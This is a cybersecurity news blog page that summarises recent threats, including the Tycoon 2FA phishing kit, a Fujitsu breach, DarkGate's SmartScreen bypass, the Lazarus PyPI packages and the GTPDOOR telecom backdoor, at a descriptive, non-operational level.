Tycoon
Gmail malware MFA Bypass Microsoft 365 multifactor authentication phishing kit Safety Security Tycoon

'Tycoon' Malware Kit Bypasses Microsoft and Google Multifactor Authentication

 

An emerging phishing kit called "Tycoon 2FA" is gaining widespread use among threat actors, who are employing it to target Microsoft 365 and Gmail email accounts. This kit, discovered by researchers at Sekoia, has been active since at least August and received updates as recent as last month to enhance its evasion techniques against multifactor authentication (MFA).

According to the researchers, Tycoon 2FA is extensively utilized in various phishing campaigns, primarily aimed at harvesting Microsoft 365 session cookies to bypass MFA processes during subsequent logins. The platform has amassed over 1,100 domain names between October 2023 and late February, with distribution facilitated through Telegram channels under different handles such as Tycoon Group, SaaadFridi, and Mr_XaaD.

Operating as a phishing-as-a-service (PhaaS) platform, Tycoon 2FA offers ready-made phishing pages for Microsoft 365 and Gmail accounts, along with attachment templates, starting at $120 for 10 days, with prices varying based on the domain extension. Transactions are conducted via Bitcoin wallets managed by the "Saad Tycoon Group," suspected to be the operator and developer of Tycoon 2FA, with over 1,800 recorded transactions as of mid-March.

The phishing technique employed by Tycoon 2FA involves an adversary-in-the-middle (AitM) approach, utilizing a reverse proxy server to host phishing webpages. This method intercepts user inputs, including MFA tokens, allowing attackers to bypass MFA even if credentials are changed between sessions.

Despite the security enhancements provided by MFA, sophisticated attacks like Tycoon 2FA pose significant threats by exploiting AitM techniques. The ease of use and relatively low cost of Tycoon 2FA make it appealing to threat actors, further compounded by its stealth capabilities that evade detection by security products.

Sekoia researchers outlined a six-stage process used by Tycoon 2FA to execute phishing attacks, including URL redirections, Cloudflare Turnstile challenges, JavaScript execution, and the presentation of fake authentication pages to victims.

The emergence of Tycoon 2FA underscores the evolving landscape of phishing attacks, challenging the effectiveness of traditional MFA methods. However, security experts suggest that certain forms of MFA, such as security keys implementing WebAuthn/FIDO2 standards, offer higher resistance against phishing attempts.

To assist organizations in identifying Tycoon 2FA activities, Sekoia has published a list of indicators of compromise (IoCs) on GitHub, including URLs associated with Tycoon 2FA phishing campaigns.
Read more »
Security Breach
Cyber Security Fujitsu Japan malware ProjectWEB Tool Security Breach

Is Your Data Safe? Fujitsu Discovers Breach, Customers Warned

 


Fujitsu, a leading Japanese technology company, recently faced a grave cybersecurity breach when it discovered malware on some of its computer systems, potentially leading to the theft of customer data. This incident raises concerns about the security of sensitive information stored by the company.

With a workforce of over 124,000 and an annual revenue of $23.9 billion, Fujitsu operates globally, providing a wide range of IT services and products, including servers, software, and telecommunications equipment. The company has a strong presence in over 100 countries and maintains crucial ties with the Japanese government, participating in various public sector projects and national security initiatives.

The cybersecurity incident was disclosed in a recent announcement on Fujitsu's news portal, revealing that the malware infection compromised several business computers, possibly allowing hackers to access and extract personal and customer-related information. In response, Fujitsu promptly isolated the affected systems and intensified monitoring of its other computers while continuing to investigate the source and extent of the breach.

Although Fujitsu has not received reports of customer data misuse, it has taken proactive measures by informing the Personal Information Protection Commission and preparing individual notifications for affected customers. The company's transparency and swift action aim to mitigate potential risks and restore trust among stakeholders.

This is not the first time Fujitsu has faced cybersecurity challenges. In May 2021, the company's ProjectWEB tool was exploited, resulting in the theft of email addresses and proprietary data from multiple Japanese government agencies. Subsequent investigations revealed vulnerabilities in ProjectWEB, leading to its discontinuation and replacement with a more secure information-sharing tool.

Fujitsu's response to the recent breach highlights the urgency of safeguarding sensitive data in these circumstances. The company's commitment to addressing the issue and protecting customer information is crucial in maintaining trust and credibility in the digital age.

As Fujitsu continues to investigate the incident, it remains essential for customers and stakeholders to remain careful and implement necessary precautions to mitigate potential risks. The company's efforts to enhance security measures and improve transparency are essential steps towards preventing future breaches and ensuring the integrity of its services and systems.


Read more »
Volt Typhoon
BlackBerry Cyber Security malware Stakeholders Volt Typhoon

Cyber Attacks Threaten Essential Services

 


As per a recent report by BlackBerry, it was revealed that critical infrastructure providers faced a surge in cyberattacks during the latter part of 2023. Shockingly, these providers bore the brunt of 62% of all industry-related cyberattacks tracked from September through December. What’s more concerning is the 27% increase in the use of novel malware during this period, indicating a deliberate effort by threat actors to circumvent traditional defense mechanisms. With over 5,300 unique malware samples targeting BlackBerry’s customers daily, the urgency for enhanced cybersecurity measures becomes evident.

Threat actors are not only leveraging novel malware but also exploiting critical vulnerabilities in widely used products such as Citrix Netscaler, Cisco Adaptive Security Appliance, and JetBrains TeamCity. By exploiting these vulnerabilities, threat groups can infiltrate targeted organisations, posing a substantial risk to their operations. Additionally, VPN appliances remain highly attractive targets for state-linked threat actors, further stressing the need for heightened security measures across all sectors.

The backdrop of rising geopolitical tensions, including Russia’s invasion of Ukraine and escalating conflicts in the Asia-Pacific region, adds another layer of complexity to the situation. U.S. authorities have already issued warnings regarding the increased threat to critical infrastructure providers, particularly from state-sponsored groups like Volt Typhoon, with ties to the People’s Republic of China. These groups aim to disrupt essential services, potentially causing mass panic and diverting attention from other geopolitical agendas.

Ismael Valenzuela, VP of threat research and intelligence at BlackBerry, underscored the gravity of the situation, stating, “The end goal of attacks, whether from financially motivated attackers or nation states, is to cause havoc.” Organisations operating in critical infrastructure sectors understand the urgency to mitigate these threats promptly, often resorting to quick payments to restore operations.

Moreover, the report highlights the growing trend of attacks exploiting vulnerable VPN devices to gain unauthorised access to critical industries. Additionally, specific malware families like PrivateLoader, RisePro, SmokeLoader, and PikaBot have witnessed increased usage, further complicating cybersecurity efforts.

This spike in cyberattacks targeting critical infrastructure demands immediate attention from stakeholders worldwide. As threat actors continue to evolve their tactics, it is imperative for organisations to prioritise cybersecurity measures and stay cautious against emerging threats. Failure to do so could have severe implications not only for individual institutions but also for the stability of essential services and national security.


Read more »
Windows SmartScreen
Bypass Flaw Cybersecurity DarkGate RAT Exploited malware Malware Campaign Threat actors Windows SmartScreen

Exploitation of Windows SmartScreen Bypass Flaw Facilitates Deployment of DarkGate RAT

 


The operators behind the DarkGate malware have been taking advantage of a recently patched flaw in Windows SmartScreen through a phishing scheme. This campaign involves circulating counterfeit Microsoft software installers to spread the malicious code.

Researchers from Trend Micro, along with others, uncovered a vulnerability earlier this year, known as CVE-2024-21412, which allowed attackers to bypass security measures in Internet Shortcut Files. Microsoft addressed this issue in its February Patch Tuesday updates, but not before threat actors like Water Hydra and DarkGate seized the opportunity to exploit it. Trend Micro's Zero Day Initiative (ZDI) reported that DarkGate also utilized this flaw in a mid-January attack, enticing users with PDFs containing Google DoubleClick Digital Marketing (DDM) redirects, ultimately leading to compromised websites hosting the malware-laden installers.

According to Trend Micro researchers Peter Girnus, Aliakbar Zahravi, and Simon Zuckerbraun, the attackers manipulated Google-related domains using open redirects in conjunction with CVE-2024-21412 to circumvent Microsoft Defender SmartScreen protections, facilitating malware infections. They emphasized the effectiveness of combining fake software installers with open redirects in propagating infections.

DarkGate, described as a remote-access Trojan (RAT), has been advertised on Russian-language cybercrime forums since at least 2018 and is considered one of the most sophisticated and active malware strains. It offers various functionalities, including process injection, information theft, shell command execution, and keylogging, while employing multiple evasion techniques.

The DarkGate campaign observed by Trend Micro leverages Google Open Redirects, exploiting a previously patched SmartScreen vulnerability, CVE-2023-36025, affecting all supported Windows versions. By utilizing open redirects in Google DDM technologies, threat actors can execute malicious code when combined with security bypasses.

To defend against DarkGate's exploitation of CVE-2024-21412, Windows system administrators are advised to apply Microsoft's patch promptly. Additionally, organizations should prioritize employee training to raise awareness about the risks of installing software from untrusted sources. Continuous monitoring of the cyber environment, including identifying vulnerabilities and potential attack vectors, is crucial for effective cybersecurity defense.

In conclusion, proactive measures are necessary for both businesses and individuals to safeguard their systems against evolving threats like DarkGate and similar malware campaigns.
Read more »
Python Package
App Developers Japan Malicious Package malware North Korea Hackers Python Package

Japan Blames Lazarus for PyPi Supply Chain Attack

 

Japanese cybersecurity officials issued a warning that North Korea's infamous Lazarus Group hacking group recently launched a supply chain attack on the PyPI software repository for Python apps. 

Threat actors disseminated contaminated packages with names like "pycryptoenv" and "pycryptoconf" that are comparable to the real "pycrypto" encryption tools for Python. Developers who are duped into installing the malicious packages onto their Windows workstations are infected with a severe Trojan called "Comebacker.” 

"The malicious Python packages confirmed this time have been downloaded approximately 300 to 1,200 times," Japan CERT noted in a warning issued late last month. "Attackers may be targeting users' typos to have the malware downloaded.” 

Comebacker is a general-purpose Trojan that can be used to deliver ransomware, steal passwords, and infiltrate the development pipeline, according to analyst and senior director at Gartner Dale Gardner. 

The trojan has been used in multiple attacks linked to North Korea, including one against a npm software development repository. 

Impacting Asian Developers

Since PyPI is a centralised service with a global reach, developers worldwide should be aware of the most recent Lazarus Group campaign. 

"This attack isn't something that would affect only developers in Japan and nearby regions," Gardner explains. "It's something for which developers everywhere should be on guard." 

Several experts believe non-native English speakers may be more vulnerable to the Lazarus Group's most recent attack. Due to communication issues and limited access to security information, the attack "may disproportionately impact developers in Asia," stated Taimur Ijlal, a tech specialist and information security leader at Netify. 

According to Academic Influence's research director, Jed Macosko, app development groups in East Asia "tend to be more tightly integrated than in other parts of the world due to shared technologies, platforms, and linguistic commonalities." He believes intruders may be looking to take advantage of regional ties and "trusted relationships." 

Small and startup software businesses in Asia often have lower security budgets than their Western counterparts, according to Macosko. "This means weaker processes, tools, and incident response capabilities — making infiltration and persistence more attainable goals for sophisticated threat actors.” 

Cyber Defence

Protecting application developers from software supply chain threats is "difficult and generally requires a number of strategies and tactics," Gartner's Gardner explained. 

Developers should use extra caution and care while downloading open source dependencies. Given the amount of open source used today and the pressures of fast-paced development environments, it's easy for even a well-trained and vigilant developer to make a mistake, Gardner added. 

Gardner recommends using software composition analysis (SCA) tools to evaluate dependencies and detect fakes or legitimate packages that have been compromised. He also suggests "proactively testing packages for the presence of malicious code" and validating packages using package managers to minimise risk.
Read more »
telecoms
Cybersecurity GPRS roaming networks GTPDOOR Linux Malware malware telecoms

Linux Malware GTPDOOR Exploits GPRS Roaming Networks to Target Telecom Companies

 

Security analysts have uncovered a fresh Linux malware named GTPDOOR, intended for deployment within telecom networks adjacent to GPRS roaming exchanges (GRX). What distinguishes this malware is its utilization of the GPRS Tunnelling Protocol (GTP) for commanding and controlling operations.

GPRS roaming enables subscribers to access their services even outside their home mobile network's coverage area. This is facilitated through a GRX, which facilitates roaming traffic via GTP between the visited and home Public Land Mobile Networks (PLMN). 

Security expert haxrob, who stumbled upon two GTPDOOR artifacts uploaded to VirusTotal originating from China and Italy, suggests that this backdoor is likely linked to a known threat actor identified as LightBasin (also known as UNC1945). 

CrowdStrike previously disclosed this actor in October 2021 for a series of attacks targeting the telecom sector to pilfer subscriber data and call metadata.

Upon execution, GTPDOOR initially alters its process name to '[syslog]', mimicking syslog invoked from the kernel, and opens a raw socket to enable the implant to receive UDP messages through the network interfaces. E

Essentially, GTPDOOR enables a threat actor with established persistence on the roaming exchange network to communicate with a compromised host by dispatching GTP-C Echo Request messages carrying a malicious payload.

These GTP-C Echo Request messages serve as a conduit for transmitting commands to execute on the infected system and relaying results back to the remote host. Furthermore, GTPDOOR can be discreetly probed from an external network by sending a TCP packet to any port number. If the implant is active, it returns a crafted empty TCP packet along with information on whether the destination port was open or responsive on the host.

According to the researcher, GTPDOOR appears tailored to reside on compromised hosts directly linked to the GRX network, which are the systems communicating with other telecommunication operator networks via GRX.
Read more »
Subscribe to: Posts (Atom)